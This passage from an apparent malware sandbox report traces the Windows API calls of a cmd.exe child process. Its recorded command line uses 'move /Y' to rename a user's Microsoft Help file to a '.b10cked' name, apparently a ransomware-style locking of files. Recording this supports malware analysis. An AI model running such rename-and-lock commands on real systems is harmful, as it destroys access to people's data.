lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked", lpFilePart=0x1ef2f0*="Hx_1033_MTOC_Hx.HxH.b10cked") returned 0x36 [0196.644] SetErrorMode (uMode=0x0) returned 0x1 [0196.644] SetLastError (dwErrCode=0x0) [0196.644] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mtoc_hx.hxh.b10cked")) returned 0xffffffff [0196.644] GetLastError () returned 0x2 [0196.644] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x1eec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec6c) returned 0x2a0e58 [0196.644] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x1eec6c | out: lpFindFileData=0x1eec6c) returned 0 [0196.645] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.645] GetLastError () returned 0x12 [0196.645] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x1eec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eec6c) returned 0x2a0e58 [0196.645] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x1eec6c | out: lpFindFileData=0x1eec6c) returned 0 [0196.645] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.645] GetLastError () returned 0x12 [0196.646] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x2b1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bd8) returned 0x2a0e58 [0196.646] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x2b1bd8 | out: lpFindFileData=0x2b1bd8) returned 0 [0196.646] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.646] GetLastError () returned 0x12 [0196.646] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", fInfoLevelId=0x1, lpFindFileData=0x2b1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1bd8) returned 0x2a0e58 [0196.646] FindNextFileW (in: hFindFile=0x2a0e58, lpFindFileData=0x2b1bd8 | out: lpFindFileData=0x2b1bd8) returned 0 [0196.646] FindClose (in: hFindFile=0x2a0e58 | out: hFindFile=0x2a0e58) returned 1 [0196.646] GetLastError () returned 0x12 [0196.646] _get_osfhandle (_FileHandle=2) returned 0xb [0196.646] GetFileType (hFile=0xb) returned 0x2 [0196.771] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.771] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eee3c | out: lpMode=0x1eee3c) returned 1 [0196.771] _get_osfhandle (_FileHandle=2) returned 0xb [0196.771] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eee70 | out: lpConsoleScreenBufferInfo=0x1eee70) returned 1 [0196.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.772] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eeeb0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.772] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eee94, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eee94*=0x2c) returned 1 [0196.772] longjmp () [0196.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.773] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.773] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.773] SetConsoleInputExeNameW () returned 0x1 [0196.773] GetConsoleOutputCP () returned 0x1b5 [0196.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.773] exit (_Code=1) Process: id = "454" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28939 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28940 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28941 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 28942 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 28943 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28944 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28945 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28946 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28947 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28948 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28959 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28960 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28961 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 28962 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 28963 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28964 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28965 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28966 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28967 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28968 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28969 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28970 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28971 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28972 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28973 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 28974 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28975 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28976 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 28977 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 28978 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28979 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 28980 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 28981 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 28982 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 29031 start_va = 0x1260000 end_va = 0x131ffff entry_point = 0x1260000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 649 os_tid = 0xbf8 [0196.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fbac | out: lpSystemTimeAsFileTime=0x12fbac*(dwLowDateTime=0xa9de1e80, dwHighDateTime=0x1d440a9)) [0196.370] GetCurrentProcessId () returned 0xbdc [0196.370] GetCurrentThreadId () returned 0xbf8 [0196.370] GetTickCount () returned 0x37a7c [0196.370] QueryPerformanceCounter (in: lpPerformanceCount=0x12fba4 | out: lpPerformanceCount=0x12fba4*=25316101724) returned 1 [0196.373] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.373] __set_app_type (_Type=0x1) [0196.373] __p__fmode () returned 0x76b331f4 [0196.373] __p__commode () returned 0x76b331fc [0196.373] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.373] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.373] GetCurrentThreadId () returned 0xbf8 [0196.373] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbf8) returned 0x38 [0196.373] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.373] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.373] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.374] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.374] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fb3c | out: phkResult=0x12fb3c*=0x0) returned 0x2 [0196.374] VirtualQuery (in: lpAddress=0x12fb73, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.374] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb0c, dwLength=0x1c | out: lpBuffer=0x12fb0c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.374] GetConsoleOutputCP () returned 0x1b5 [0196.374] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.374] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.374] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.374] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.375] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.375] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.375] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.375] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.375] GetEnvironmentStringsW () returned 0x1b0180* [0196.376] FreeEnvironmentStringsW (penv=0x1b0180) returned 1 [0196.376] GetEnvironmentStringsW () returned 0x1b0180* [0196.376] FreeEnvironmentStringsW (penv=0x1b0180) returned 1 [0196.376] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eaac | out: phkResult=0x12eaac*=0x40) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0xa8, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x0, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.376] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.376] RegCloseKey (hKey=0x40) returned 0x0 [0196.376] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eaac | out: phkResult=0x12eaac*=0x40) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x40, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x1, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x0, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x4, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x4) returned 0x0 [0196.377] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eab4, lpData=0x12eab8, lpcbData=0x12eab0*=0x1000 | out: lpType=0x12eab4*=0x0, lpData=0x12eab8*=0x9, lpcbData=0x12eab0*=0x1000) returned 0x2 [0196.377] RegCloseKey (hKey=0x40) returned 0x0 [0196.377] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.377] srand (_Seed=0x5b88639e) [0196.377] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" [0196.377] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked\"" [0196.377] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.378] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.378] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.378] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.378] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.378] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.378] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.378] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.378] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.378] GetEnvironmentStringsW () returned 0x1b22d0* [0196.379] FreeEnvironmentStringsW (penv=0x1b22d0) returned 1 [0196.379] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.379] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.379] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.379] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.379] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.379] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.379] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.379] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.379] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.379] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f878, lpFilePart=0x12f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f874*="Desktop") returned 0x18 [0196.379] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.379] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.379] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.380] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.550] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.551] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f5f4 | out: lpFindFileData=0x12f5f4) returned 0x1b0010 [0196.551] FindClose (in: hFindFile=0x1b0010 | out: hFindFile=0x1b0010) returned 1 [0196.551] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.551] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.551] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.551] GetEnvironmentStringsW () returned 0x1b2af0* [0196.551] FreeEnvironmentStringsW (penv=0x1b2af0) returned 1 [0196.551] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.551] GetConsoleOutputCP () returned 0x1b5 [0196.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.552] GetUserDefaultLCID () returned 0x409 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="0") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="0") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f9b8, cchData=128 | out: lpLCData="1") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.552] 